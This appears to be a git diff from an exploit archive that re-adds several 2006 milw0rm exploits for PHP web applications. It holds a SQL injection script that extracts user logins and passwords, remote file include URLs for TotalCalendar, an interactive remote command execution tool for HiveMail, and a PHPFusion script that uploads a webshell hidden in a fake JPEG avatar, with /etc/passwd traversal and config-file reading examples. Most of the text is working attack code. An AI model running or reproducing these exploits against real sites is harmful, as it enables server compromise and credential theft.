+   $out = "GET $path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20from%20lm_users%20where%20id=$id/* HTTP/1.1\r\n";
+   $out .= "Host: $host\r\n";
+   $out .= "Connection: Close\r\n\r\n";
+
+   fwrite($fp, $out);
+   while (!feof($fp)) {
+	   $f = fgets($fp, 1024);
+       if ( (preg_match("/<div class=\"componentheading\" >/",$f)) && (preg_match("/login/",$f)) )
+       {
+			echo "$f";
+			echo "[+] Enjoy! :><br>";
+			$success = 1;
+	   }
+   }
+   fclose($fp);
+   
+   if (!$success)
+	echo "<br>[-] exploit failed :<<br>";
+}
+?> 
+</pre>
+
+# milw0rm.com [2006-05-05]
diff --git a/platforms/php/webapps/1753.txt b/platforms/php/webapps/1753.txt
index 810aa8ff9..24f0457d0 100755
--- a/platforms/php/webapps/1753.txt
+++ b/platforms/php/webapps/1753.txt
@@ -1,19 +1,19 @@
-Title: TotalCalendar <=2.30 - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: SweetPHP
-URL: http://sweetphp.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "Powered by TotalCalendar"
------------------------------------------------------------------
-
-Exploitation:
-
-/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
-/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF
-
-# milw0rm.com [2006-05-05]
+Title: TotalCalendar <=2.30 - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: SweetPHP
+URL: http://sweetphp.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "Powered by TotalCalendar"
+-----------------------------------------------------------------
+
+Exploitation:
+
+/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
+/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF
+
+# milw0rm.com [2006-05-05]
diff --git a/platforms/php/webapps/1756.pl b/platforms/php/webapps/1756.pl
index f26d95736..c8131355c 100755
--- a/platforms/php/webapps/1756.pl
+++ b/platforms/php/webapps/1756.pl
@@ -1,124 +1,124 @@
-#!/usr/bin/perl                                     #
-#                                                   #
-# HiveMail <= 1.3 remote command execution exploit  #
-#                                                   #
-#################################################################################
-#                                                                               #
-# Advisory:                                                                     #
-# http://www.gulftech.org/?node=research&article_id=00098-02102006              #
-#                                                                               #
-# To get the hivesession:                                                       #
-# log on hivemail with firefox then look at the hivesession number in the url.  #
-# (yes i know...)                                                               #
-#                                                                               #
-#################################################################################
-#                                                                      #
-# Dork:                                                                #
-# "Already have an account?" "Enter your information below to log in." #
-#                                                                      #
-########################################################################
-#               #
-# coded by [Oo] #
-#               #
-#################
-
-
-require LWP::UserAgent;
-use URI;
-use Getopt::Long;
-
-$| = 1;  # fflush stdout after print
-
-# Default options
-# connection 
-my $basic_auth_user = '';
-my $basic_auth_pass = '';
-my $proxy = '';
-my $proxy_user = '';
-my $proxy_pass = '';
-my $conn_timeout = 15;
-
-# general
-my $host;
-my $session;
- 
- print "\n[i] HiveMail <= 1.3 remote command execution exploit\n";
- print "[i] coded by [Oo]\n";
- 
-
- # read command line options
- my $options = GetOptions (
-
- #general options
- 'host=s'    => \$host, # input host to test.
- 'session=s'    => \$session, # input host to test.
- # connection options
- 'basic_auth_user=s' => \$basic_auth_user,
- 'basic_auth_pass=s' => \$basic_auth_pass,
- 'proxy=s'           => \$proxy,
- 'proxy_user=s'      => \$proxy_user,
- 'proxy_pass=s'      => \$proxy_pass,
- 'timeout=i'         => \$conn_timeout);
- 
- # command line sanity check 
- &show_usage unless ($host);
- &show_usage unless ($session);
- 
- # main loop 
- while (1){
- 	print "\n[hivemail] ";
- 	my $cmd = <STDIN>;
- 	hm_xploit ($cmd);
- }
-
- exit (1);
-
-#exploit 
-sub hm_xploit {
-  chomp (my $data = shift);
-  
-  if ($data eq "exit") { print "\n[e] Exit!\n";exit(); }
-
-  my $exp = $host."addressbook.add.php?hivesession=".$session."&cmd=quick&messageid=\");echo%20\"start_er\";system(\$com);echo%20\"end_er\";\@d(\"&popid=1&com=".$data." ";
-  my $req = new HTTP::Request 'GET' => $exp;
- 
-  
-  my $ua = new LWP::UserAgent;
-  $ua->timeout($conn_timeout);
-
-  if ($basic_auth_user){
-    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 
-  }
-  if ($proxy){
-    $ua->proxy(['http'] => $proxy);
-    $req->proxy_authorization_basic($proxy_user, $proxy_pass);
-  }
-
-	 
-  my $res = $ua->request($req);
-  my $show = $res->content;
-  
-  print"\n";
-  if ($show =~ m/start_er(.*?)end_er/ms) {
-    my $out = $1;
-    $out =~ s/^\s+|\s+$//gs;
-    if ($out) {
-      print "$out\n";
-    }
-  }
-  
-}
-
-# show options 
-sub show_usage {
-  print "\n[*] Usage: ./hmail_exp.pl [options] [host] [session]\n";
-  print "[*] Options:\n";
-  print "\t--proxy (http), --proxy_user, --proxy_pass\n";
-  print "\t--basic_auth_user, --basic_auth_pass\n";
-  print "\t--timeout \n";
-  print "[*] Example:\n";
-  print "    hmail_exp.pl --host=http://127.0.0.1/hivemail/ --session=22ead72ecf6af376a801923466a23efa\n";
-  exit(1);
-}
-
-# milw0rm.com [2006-05-06]
+#!/usr/bin/perl                                     #
+#                                                   #
+# HiveMail <= 1.3 remote command execution exploit  #
+#                                                   #
+#################################################################################
+#                                                                               #
+# Advisory:                                                                     #
+# http://www.gulftech.org/?node=research&article_id=00098-02102006              #
+#                                                                               #
+# To get the hivesession:                                                       #
+# log on hivemail with firefox then look at the hivesession number in the url.  #
+# (yes i know...)                                                               #
+#                                                                               #
+#################################################################################
+#                                                                      #
+# Dork:                                                                #
+# "Already have an account?" "Enter your information below to log in." #
+#                                                                      #
+########################################################################
+#               #
+# coded by [Oo] #
+#               #
+#################
+
+
+require LWP::UserAgent;
+use URI;
+use Getopt::Long;
+
+$| = 1;  # fflush stdout after print
+
+# Default options
+# connection 
+my $basic_auth_user = '';
+my $basic_auth_pass = '';
+my $proxy = '';
+my $proxy_user = '';
+my $proxy_pass = '';
+my $conn_timeout = 15;
+
+# general
+my $host;
+my $session;
+ 
+ print "\n[i] HiveMail <= 1.3 remote command execution exploit\n";
+ print "[i] coded by [Oo]\n";
+ 
+
+ # read command line options
+ my $options = GetOptions (
+
+ #general options
+ 'host=s'    => \$host, # input host to test.
+ 'session=s'    => \$session, # input host to test.
+ # connection options
+ 'basic_auth_user=s' => \$basic_auth_user,
+ 'basic_auth_pass=s' => \$basic_auth_pass,
+ 'proxy=s'           => \$proxy,
+ 'proxy_user=s'      => \$proxy_user,
+ 'proxy_pass=s'      => \$proxy_pass,
+ 'timeout=i'         => \$conn_timeout);
+ 
+ # command line sanity check 
+ &show_usage unless ($host);
+ &show_usage unless ($session);
+ 
+ # main loop 
+ while (1){
+ 	print "\n[hivemail] ";
+ 	my $cmd = <STDIN>;
+ 	hm_xploit ($cmd);
+ }
+
+ exit (1);
+
+#exploit 
+sub hm_xploit {
+  chomp (my $data = shift);
+  
+  if ($data eq "exit") { print "\n[e] Exit!\n";exit(); }
+
+  my $exp = $host."addressbook.add.php?hivesession=".$session."&cmd=quick&messageid=\");echo%20\"start_er\";system(\$com);echo%20\"end_er\";\@d(\"&popid=1&com=".$data." ";
+  my $req = new HTTP::Request 'GET' => $exp;
+ 
+  
+  my $ua = new LWP::UserAgent;
+  $ua->timeout($conn_timeout);
+
+  if ($basic_auth_user){
+    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 
+  }
+  if ($proxy){
+    $ua->proxy(['http'] => $proxy);
+    $req->proxy_authorization_basic($proxy_user, $proxy_pass);
+  }
+
+	 
+  my $res = $ua->request($req);
+  my $show = $res->content;
+  
+  print"\n";
+  if ($show =~ m/start_er(.*?)end_er/ms) {
+    my $out = $1;
+    $out =~ s/^\s+|\s+$//gs;
+    if ($out) {
+      print "$out\n";
+    }
+  }
+  
+}
+
+# show options 
+sub show_usage {
+  print "\n[*] Usage: ./hmail_exp.pl [options] [host] [session]\n";
+  print "[*] Options:\n";
+  print "\t--proxy (http), --proxy_user, --proxy_pass\n";
+  print "\t--basic_auth_user, --basic_auth_pass\n";
+  print "\t--timeout \n";
+  print "[*] Example:\n";
+  print "    hmail_exp.pl --host=http://127.0.0.1/hivemail/ --session=22ead72ecf6af376a801923466a23efa\n";
+  exit(1);
+}
+
+# milw0rm.com [2006-05-06]
diff --git a/platforms/php/webapps/1760.php b/platforms/php/webapps/1760.php
index 28553d958..2e0a7be57 100755
--- a/platforms/php/webapps/1760.php
+++ b/platforms/php/webapps/1760.php
@@ -1,610 +1,610 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload &\r\n";
-echo "local inclusion vulnerabilities\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-if ($argc<6) {
-echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to PHPFusion\r\n";
-echo "cmd:       a shell command\r\n";
-echo "user/pass: you need a valid user account to upload an avatar\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phpfusion/ your_username password cat ./../../config.php\r\n";
-echo "php ".$argv[0]." localhost /phpfusion/ your_username password ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
-die;
-}
-
-/* explaination:
-
-   software site: http://www.php-fusion.co.uk/
-
-   description: "a light-weight open-source content management system (CMS)
-   written in PHP. It utilises a mySQL database to store your site content and
-   includes a simple, comprehensive adminstration system."
-
-   tested versions:   PHPFusion v6.00.306
-                      PHPFusion v6.00.207
-                      PHPFusion v6.00.110
-
-
-   i) vulnerable code in includes/update_profile_include.php at lines 69-90:
-
-   ...
-   $newavatar = $_FILES['user_avatar'];
-	if ($userdata['user_avatar'] == "" && !empty($newavatar['name']) && is_uploaded_file($newavatar['tmp_name'])) {
-		if (preg_match("/^[-0-9A-Z_\.\[\]]+$/i", $newavatar['name']) && $newavatar['size'] <= 30720) {
-                       	$avatarext = strrchr($newavatar['name'],".");
-			if (eregi(".gif", $avatarext) || eregi(".jpg", $avatarext) || eregi(".png", $avatarext)) {
-				$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], "."));
-				$avatarname = $avatarname."[".$userdata['user_id']."]".$avatarext;
-				$set_avatar = "user_avatar='$avatarname', ";
-				move_uploaded_file($newavatar['tmp_name'], IMAGES."avatars/".$avatarname);
-				chmod(IMAGES."avatars/".$avatarname,0644);
-				if ($size = @getimagesize(IMAGES."avatars/".$avatarname)) {
-					if ($size['0'] > 100 || $size['1'] > 100) {
-						unlink(IMAGES."avatars/".$avatarname);
-						$set_avatar = "";
-					}
-				} else {
-					unlink(IMAGES."avatars/".$avatarname);
-					$set_avatar = "";
-				}
-			}
-		}
-	}
-   ...
-
-   A remote user can upload a malicious avatar with multiple extensions,
-   (ex.: .php.php.gif-fakechars-) and with php code inside as EXIF metadata
-   content.
-   It seems that Apache mod_mime module considers double-extension files like
-   file.php.gif[somefakechars] to be valid PHP files and runs the arbitrary
-   code that has been uploaded. Actually I can't say which Apache versions, this
-   was tested against Apache/1.3.27 with PHP/4.3.3
-
-   A note: file is renamed like this
-   .php.php[user_id].gif-fakechars-
-
-   ii) vulnerable code in infusions/last_seen_users_panel/last_seen_users_panel.php
-       at lines 12-16:
-
-   ...
-   if (file_exists(INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php")) {
-	include INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php";
-} else {
-	include INFUSIONS."last_seen_users_panel/locale/English.php";
-}
-   ...
-
-    $settings['locale'] var is not properly sanitized before to be used to
-    include files so, if register_globals=on & magic_quotes_gpc=Off,
-    you can include local resources, poc:
-
-    http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=../../../../../../../../../etc/passw%00
-    http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?cmd=ls%20-la&settings[locale]=../../../../images/avatars/suntzu[1].jpg%00
-
-    A note: if INFUSIONS constant is not defined, PHP will assume it as it is,
-    as "INFUSIONS" string. On some system , no matters if "INFUSIONSlast_seen_users_panel/locale/........"
-    path does not exist, you will go up from the non-existent dir of exactly four
-    dirs to include the malicious avatar.
-    This works against on 6.00.306
-
-    iii) vulnerable code in setup.php at lines 14-15:
-
-    ...
-    $localeset = (isset($_GET['localeset']) ? $_GET['localeset'] : "English");
-    include "locale/".$localeset."/setup.php";
-    ...
-
-    if this script is not deleted after installation, if magic_quotes_gpc=Off,
-    you can include files from locale resources, poc:
-
-    http://[target]/[path]/setup.php?localeset=../../../../../../../../../../etc/passwd%00
-    http://[target]/[path]/setup.php?cmd=ls%20-la&localeset=../images/avatars/suntzu[1].jpg%00
-
-    this tool tries to exploit all theese vulnerabilities, you need a valid user
-    account to upload avatars
-*/
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-function sendpacketiii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-$host=$argv[1];
-$path=$argv[2];
-$username=$argv[3];
-$pass=$argv[4];
-$cmd="";$port=80;$proxy="";
-for ($i=5; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$mypaths= array (
-		 'images/avatars/',
-		 '',
-		 'infusions/last_seen_users_panel/'
-		);
-
-echo "step 0 -> Check if suntzu.php is already installed...\r\n";
-for ($i=0; $i<=count($mypaths)-1; $i++)
-{
-$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-  echo "Exploit succeeded...";
-  $temp=explode("56789",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-}
-
-echo "step 1 -> login...\r\n";
-$data ="user_name=".urlencode(trim($username));
-$data.="&user_pass=".urlencode(trim($pass));
-$data.="&login=Login";
-$packet="POST ".$p."news.php HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
-$packet.="Referer: http://".$host.$path."news.php\r\n";
-$packet.="Accept-Language: en\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Keep-Alive\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(' ',$temp[1]);
-$cookie=$temp2[0];
-echo 'Your cookie: '.$cookie."\r\n";
-$temp=explode("fusion_user=",$cookie);
-$temp2=explode(".",$temp[1]);
-$user_id=trim($temp2[0]);
-echo 'Your user id: '.$user_id."\r\n";
-
-echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
-$avatar=".php.php.gif-fakechars-";
-$shell=
-chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
-chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
-chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
-chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
-chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
-chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
-chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
-chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
-chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
-chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
-chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
-chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
-chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
-chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
-chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
-chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
-chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
-chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
-chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
-chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
-chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
-chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
-chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
-chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
-chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
-chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
-chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
-chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
-chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
-chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
-chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
-chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
-chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
-chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
-chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
-chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
-chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
-chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
-chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
-chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
-chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
-
-/*
-this image has this code inside as EXIF metadata content
-<?php
-$fp=fopen("suntzu.php","w");
-fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
-fclose($fp);
-chmod("suntzu.php",777);
-?>
-*/
-
-$data='-----------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_name"
-
-'.$username.'
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_newpassword"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_newpassword2"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_email"
-
-succcccccp@hotmail.com
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_hide_email"
-
-1
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_location"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_month"
-
---
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_day"
-
---
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_year"
-
-----
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_aim"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_icq"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_msn"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_yahoo"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_web"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_theme"
-
-Default
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_offset"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_avatar"; filename="'.$avatar.'"
-Content-Type: application/octet-stream
-
-'.$shell.'
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_sig"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_hash"
-
-'.md5($pass).'
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="update_profile"
-
-Update Profile
------------------------------7d6ee3a7074a--
-';
-
-
-$packet ="POST ".$p."edit_profile.php? HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."edit_profile.php\r\n";
-$packet.="Accept-Language: en\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Keep-Alive\r\n";
-$packet.="Cookie: fusion_visited=yes; ".$cookie." PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n";
